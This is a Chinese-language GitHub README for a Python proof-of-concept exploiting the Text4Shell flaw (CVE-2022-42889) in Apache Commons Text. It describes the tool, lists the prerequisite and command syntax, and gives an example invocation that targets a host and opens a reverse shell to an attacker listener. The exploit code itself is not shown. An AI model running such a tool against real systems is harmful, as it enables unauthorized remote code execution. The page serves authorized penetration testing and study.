Goultarde/CVE-2022-42889-text4shell

GitHub: Goultarde/CVE-2022-42889-text4shell

针对 Apache Commons Text Text4Shell 漏洞(CVE-2022-42889)的自动化渗透测试 PoC 脚本,通过脚本插值触发 RCE 并建立反弹 Shell。

Stars: 0 | Forks: 0

# CVE-2022-42889-text4shell ## 描述 该脚本是一个渗透测试工具,旨在利用 Apache Commons Text(版本 < 1.10.0)中的 CVE-2022-42889 漏洞(也称为 Text4Shell)。它可以自动投递基于 Java 的 payload 以触发反弹 shell。 此实现基于公开的漏洞利用代码:[https://www.exploit-db.com/exploits/52261](https://www.exploit-db.com/exploits/52261) ## 功能 * 使用 argparse 处理命令行参数,提供更好的可用性。 * 精确的 URL 编码,确保与 Java payload 的兼容性。 * 支持自定义路径和易受攻击的参数目标。 ## 用法 ### 前置条件 该脚本需要 Python 3 和 requests 库。 ``` pip install requests ``` ### 语法 ``` python3 exploit.py -t $IP -p $PORT -u -param $PARAMETER -L $LHOST -P $LPORT ``` ### 示例 ``` python3 exploit.py -t 10.10.10.10 -p 8080 -u /search/ -param query -L 10.10.14.5 -P 139 ``` ## 免责声明 本工具仅供教育目的和授权的渗透测试使用。对于因滥用此脚本而造成的任何损害,作者不承担任何责任。
标签:CISA项目, Go语言工具, Python, 无后门, 概念验证